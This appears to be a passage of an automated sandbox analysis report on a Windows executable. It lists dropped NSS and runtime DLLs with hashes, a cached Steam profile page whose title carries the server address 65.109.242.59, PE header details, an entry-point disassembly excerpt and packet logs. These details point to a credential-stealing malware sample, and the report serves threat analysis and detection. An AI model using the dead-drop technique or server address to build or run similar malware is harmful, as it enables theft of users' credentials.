                                                                                  SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\ProgramData\KECBFBAEBKJJ\softokn3.dll

                                                                                  Download File
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):257872
                                                                                  Entropy (8bit):6.727482641240852
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                  MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                  SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                  SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                  SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\ProgramData\KECBFBAEBKJJ\vcruntime140.dll

                                                                                  Download File
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):80880
                                                                                  Entropy (8bit):6.920480786566406
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                  MD5:A37EE36B536409056A86F50E67777DD7
                                                                                  SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                  SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                  SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\sqls[1].dll

                                                                                  Download File
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):2459136
                                                                                  Entropy (8bit):6.052474106868353
                                                                                  Encrypted:false
                                                                                  SSDEEP:49152:WHoJ9zGioiMjW2RrL9B8SSpiCH7cuez9A:WHoJBGqabRnj8JY/9
                                                                                  MD5:90E744829865D57082A7F452EDC90DE5
                                                                                  SHA1:833B178775F39675FA4E55EAB1032353514E1052
                                                                                  SHA-256:036A57102385D7F0D7B2DEACF932C1C372AE30D924365B7A88F8A26657DD7550
                                                                                  SHA-512:0A2D112FF7CB806A74F5EC17FE097D28107BB497D6ED5AD28EA47E6795434BA903CDB49AAF97A9A99C08CD0411F1969CAD93031246DC107C26606A898E570323
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........7.Z.Y.Z.Y.Z.Y...Z.n.Y...\..Y...]...Y...X.Y.Y.Z.X..Y.O.\.E.Y.O.].U.Y.O.Z.L.Y.l3].[.Y.l3Y.[.Y.l3..[.Y.l3[.[.Y.RichZ.Y.................PE..L...i.`e...........!...%.. .........{D........ ...............................%...........@...........................#..6....$.(.....$.......................$.....`.#.8...........................x.#.@.............$..............................text...G. ....... ................. ..`.rdata...".... ..$.... .............@..@.data...4|... $..b....#.............@....idata........$......^$.............@..@.00cfg........$......p$.............@..@.rsrc.........$......r$.............@..@.reloc..5.....$.......$.............@..B................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\76561199689717899[1].htm

                                                                                  Download File
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with very long lines (3063), with CRLF, LF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):35682
                                                                                  Entropy (8bit):5.380723452875077
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:s7pqLtWYmwt5D0gqOaiNGA7PzzgiJmDzJtxvrfukPco1AUmPzzgiJmDzJtxvJ2SN:s78LtWYmwt5D0gqOac7PzzgiJmDzJtxB
                                                                                  MD5:601E9F0E076797DABCCCC619233CD4C8
                                                                                  SHA1:CCBF3112397B034E4F213B44B5F3982EEF544B38
                                                                                  SHA-256:44DFE2CDEF9ADA1A1BDF568A940D47D3A91BE90B98C93D25983BE6CB706EC8F6
                                                                                  SHA-512:6CE7B41D3A7328CE2D3248529676359F436AE91D6A570BED55043F29E78FED90342D2C4CF8E1CA8768DC74272D7FE23F24D06C3008FE5B0D922D5866D3CB52A3
                                                                                  Malicious:false
                                                                                  Preview:<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: r0is https://65.109.242.59|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=E0c90DJSB6Ld&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/css/globalv2.cs

                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\freebl3[1].dll

                                                                                  Download File
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):685392
                                                                                  Entropy (8bit):6.872871740790978
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                  MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                  SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                  SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                  SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\mozglue[1].dll

                                                                                  Download File
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):608080
                                                                                  Entropy (8bit):6.833616094889818
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                  MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                  SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                  SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                  SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\msvcp140[1].dll

                                                                                  Download File
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):450024
                                                                                  Entropy (8bit):6.673992339875127
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                  MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                  SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                  SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                  SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\nss3[1].dll

                                                                                  Download File
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):2046288
                                                                                  Entropy (8bit):6.787733948558952
                                                                                  Encrypted:false
                                                                                  SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                  MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                  SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                  SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                  SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\softokn3[1].dll

                                                                                  Download File
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):257872
                                                                                  Entropy (8bit):6.727482641240852
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                  MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                  SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                  SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                  SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\vcruntime140[1].dll

                                                                                  Download File
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):80880
                                                                                  Entropy (8bit):6.920480786566406
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                  MD5:A37EE36B536409056A86F50E67777DD7
                                                                                  SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                  SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                  SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                  Static File Info

                                                                                  General

                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Entropy (8bit):7.572113333742383
                                                                                  TrID:
                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                  File name:file.exe
                                                                                  File size:363'520 bytes
                                                                                  MD5:22152460b13e4c2473dc3fcdea192933
                                                                                  SHA1:48ce4a69302e860cd905cd02a10aac942f09d9f3
                                                                                  SHA256:51cba9b4aefefaf72a791e1929f98553f50d643a22179a6aaac9d13f45ea8b43
                                                                                  SHA512:1dbcc6f21c9adfc4f28434cffac8c00fb251e3fbf574a69345792837989f74bfc74a67462e7c4f71333a07caf90e0f3e6c51daf0b2640bae3e06af14c8855104
                                                                                  SSDEEP:6144:KnRqyzZ8VqCaMx3CkcY7FGCdGr0gx1POGIAYanWdHBSxz27XrvnksFwemJ:6RqyzZ2IOGCgfPOGI2nWdhSzUbkReG
                                                                                  TLSH:9274E111B4C0C072D97319360AE8DAB4AE7EF9704A769DAF37580FBF4F31181D621A66
                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......I.w/...|...|...|...}...|...}...|...}...|...}...|...|V..|.l.}...|.l.}...|.l.}@..|.o.}...|.o.}...|Rich...|................PE..L..

                                                                                  File Icon

                                                                                  Icon Hash:00928e8e8686b000

                                                                                  Static PE Info

                                                                                  General

                                                                                  Entrypoint:0x404787
                                                                                  Entrypoint Section:.text
                                                                                  Digitally signed:false
                                                                                  Imagebase:0x400000
                                                                                  Subsystem:windows gui
                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                  Time Stamp:0x6650AED1 [Fri May 24 15:14:25 2024 UTC]
                                                                                  TLS Callbacks:
                                                                                  CLR (.Net) Version:
                                                                                  OS Version Major:6
                                                                                  OS Version Minor:0
                                                                                  File Version Major:6
                                                                                  File Version Minor:0
                                                                                  Subsystem Version Major:6
                                                                                  Subsystem Version Minor:0
                                                                                  Import Hash:9c7649e277995f91579a552a896e22fd

                                                                                  Entrypoint Preview

                                                                                  Instruction
                                                                                  call 00007FE6D5616A06h
                                                                                  jmp 00007FE6D5616299h
                                                                                  cmp ecx, dword ptr [00427040h]
                                                                                  jne 00007FE6D5616423h
                                                                                  ret
                                                                                  jmp 00007FE6D5616D43h
                                                                                  push ebp
                                                                                  mov ebp, esp
                                                                                  jmp 00007FE6D561642Fh
                                                                                  push dword ptr [ebp+08h]
                                                                                  call 00007FE6D561F73Ch
                                                                                  pop ecx
                                                                                  test eax, eax
                                                                                  je 00007FE6D5616431h
                                                                                  push dword ptr [ebp+08h]
                                                                                  call 00007FE6D561C404h
                                                                                  pop ecx
                                                                                  test eax, eax
                                                                                  je 00007FE6D5616408h
                                                                                  pop ebp
                                                                                  ret
                                                                                  cmp dword ptr [ebp+08h], FFFFFFFFh
                                                                                  je 00007FE6D5612DEBh
                                                                                  jmp 00007FE6D5616EE8h
                                                                                  push ebp
                                                                                  mov ebp, esp
                                                                                  push dword ptr [ebp+08h]
                                                                                  call 00007FE6D5616EFAh
                                                                                  pop ecx
                                                                                  pop ebp
                                                                                  ret
                                                                                  push ebp
                                                                                  mov ebp, esp
                                                                                  test byte ptr [ebp+08h], 00000001h
                                                                                  push esi
                                                                                  mov esi, ecx
                                                                                  mov dword ptr [esi], 0041E0B8h
                                                                                  je 00007FE6D561642Ch
                                                                                  push 0000000Ch
                                                                                  push esi
                                                                                  call 00007FE6D56163FDh
                                                                                  pop ecx
                                                                                  pop ecx
                                                                                  mov eax, esi
                                                                                  pop esi
                                                                                  pop ebp
                                                                                  retn 0004h
                                                                                  jmp 00007FE6D5616ECFh
                                                                                  push ebp
                                                                                  mov ebp, esp
                                                                                  mov eax, dword ptr [ebp+08h]
                                                                                  push esi
                                                                                  mov ecx, dword ptr [eax+3Ch]
                                                                                  add ecx, eax
                                                                                  movzx eax, word ptr [ecx+14h]
                                                                                  lea edx, dword ptr [ecx+18h]
                                                                                  add edx, eax
                                                                                  movzx eax, word ptr [ecx+06h]
                                                                                  imul esi, eax, 28h
                                                                                  add esi, edx
                                                                                  cmp edx, esi
                                                                                  je 00007FE6D561643Bh
                                                                                  mov ecx, dword ptr [ebp+0Ch]
                                                                                  cmp ecx, dword ptr [edx+0Ch]
                                                                                  jc 00007FE6D561642Ch
                                                                                  mov eax, dword ptr [edx+08h]
                                                                                  add eax, dword ptr [edx+0Ch]
                                                                                  cmp ecx, eax
                                                                                  jc 00007FE6D561642Eh
                                                                                  add edx, 28h
                                                                                  cmp edx, esi
                                                                                  jne 00007FE6D561640Ch
                                                                                  xor eax, eax
                                                                                  pop esi
                                                                                  pop ebp
                                                                                  ret
                                                                                  mov eax, edx
                                                                                  jmp 00007FE6D561641Bh
                                                                                  push esi
                                                                                  call 00007FE6D5616E8Ah

                                                                                  Data Directories

                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x259680x28.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x5c0000x194c.reloc
                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x23fa00x1c.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x23ee00x40.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x1d0000x140.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                  Sections

                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                  .text0x10000x1a3f10x1a400e40902fdbe6c814807bbd6a64cee09d5False0.5835379464285714data6.60811813591082IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                  .bss0x1c0000x2fa0x40086441cba0c548bebc49c49f0b1147f12False0.658203125data5.4215829519180945IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                  .rdata0x1d0000x909c0x92008b8253491d95044873525e7519fa05b1False0.3895547945205479data4.694415414002728IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                  .data0x270000x341840x33400b19dbfa8f8e511a6cc3a83ea5425ff6bFalse0.9843464176829269DOS executable (block device driver \377\377\377\377)7.98435943566242IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                  .reloc0x5c0000x194c0x1a00536839c22ea48f7ccd03271346b5ce91False0.7444411057692307data6.4550533107594115IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                  Imports

                                                                                  DLLImport
                                                                                  KERNEL32.dllVirtualAlloc, GetModuleHandleA, WaitForSingleObjectEx, CreateThread, GetProcAddress, EncodePointer, DecodePointer, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, MultiByteToWideChar, WideCharToMultiByte, LCMapStringEx, GetStringTypeW, GetCPInfo, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, GetModuleHandleW, GetCurrentProcess, TerminateProcess, CreateFileW, RaiseException, RtlUnwind, GetLastError, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, GetStdHandle, WriteFile, GetModuleFileNameW, ExitProcess, GetModuleHandleExW, GetCommandLineA, GetCommandLineW, HeapAlloc, HeapFree, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetFileType, CloseHandle, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, ReadFile, GetFileSizeEx, SetFilePointerEx, ReadConsoleW, HeapReAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableW, SetStdHandle, GetProcessHeap, HeapSize, WriteConsoleW

                                                                                  Network Behavior

                                                                                  Network Port Distribution

                                                                                  TCP Packets

                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  May 24, 2024 17:46:54.573434114 CEST49710443192.168.2.6104.102.42.29
                                                                                  May 24, 2024 17:46:54.573471069 CEST44349710104.102.42.29192.168.2.6
                                                                                  May 24, 2024 17:46:54.573609114 CEST49710443192.168.2.6104.102.42.29
                                                                                  May 24, 2024 17:46:54.579663038 CEST49710443192.168.2.6104.102.42.29
                                                                                  May 24, 2024 17:46:54.579679966 CEST44349710104.102.42.29192.168.2.6
                                                                                  May 24, 2024 17:46:55.238326073 CEST44349710104.102.42.29192.168.2.6
                                                                                  May 24, 2024 17:46:55.238667965 CEST49710443192.168.2.6104.102.42.29
                                                                                  May 24, 2024 17:46:55.538379908 CEST49710443192.168.2.6104.102.42.29
                                                                                  May 24, 2024 17:46:55.538404942 CEST44349710104.102.42.29192.168.2.6
                                                                                  May 24, 2024 17:46:55.538774014 CEST44349710104.102.42.29192.168.2.6
                                                                                  May 24, 2024 17:46:55.538836956 CEST49710443192.168.2.6104.102.42.29
                                                                                  May 24, 2024 17:46:55.542732954 CEST49710443192.168.2.6104.102.42.29
                                                                                  May 24, 2024 17:46:55.586498976 CEST44349710104.102.42.29192.168.2.6
                                                                                  May 24, 2024 17:46:56.021023989 CEST44349710104.102.42.29192.168.2.6
                                                                                  May 24, 2024 17:46:56.021080971 CEST44349710104.102.42.29192.168.2.6
                                                                                  May 24, 2024 17:46:56.021138906 CEST44349710104.102.42.29192.168.2.6
                                                                                  May 24, 2024 17:46:56.021270037 CEST49710443192.168.2.6104.102.42.29
                                                                                  May 24, 2024 17:46:56.021270037 CEST49710443192.168.2.6104.102.42.29
                                                                                  May 24, 2024 17:46:56.021286964 CEST44349710104.102.42.29192.168.2.6
                                                                                  May 24, 2024 17:46:56.021343946 CEST49710443192.168.2.6104.102.42.29
                                                                                  May 24, 2024 17:46:56.093892097 CEST44349710104.102.42.29192.168.2.6
                                                                                  May 24, 2024 17:46:56.093919992 CEST44349710104.102.42.29192.168.2.6
                                                                                  May 24, 2024 17:46:56.094182968 CEST49710443192.168.2.6104.102.42.29
                                                                                  May 24, 2024 17:46:56.094193935 CEST44349710104.102.42.29192.168.2.6
                                                                                  May 24, 2024 17:46:56.094244957 CEST49710443192.168.2.6104.102.42.29
                                                                                  May 24, 2024 17:46:56.097821951 CEST44349710104.102.42.29192.168.2.6
                                                                                  May 24, 2024 17:46:56.097933054 CEST49710443192.168.2.6104.102.42.29
                                                                                  May 24, 2024 17:46:56.099214077 CEST44349710104.102.42.29192.168.2.6
                                                                                  May 24, 2024 17:46:56.099282026 CEST44349710104.102.42.29192.168.2.6
                                                                                  May 24, 2024 17:46:56.099288940 CEST49710443192.168.2.6104.102.42.29
                                                                                  May 24, 2024 17:46:56.099349022 CEST49710443192.168.2.6104.102.42.29
                                                                                  May 24, 2024 17:46:56.099356890 CEST44349710104.102.42.29192.168.2.6
                                                                                  May 24, 2024 17:46:56.099452019 CEST49710443192.168.2.6104.102.42.29
                                                                                  May 24, 2024 17:46:56.099452019 CEST49710443192.168.2.6104.102.42.29
                                                                                  May 24, 2024 17:46:56.126478910 CEST49711443192.168.2.665.109.242.59
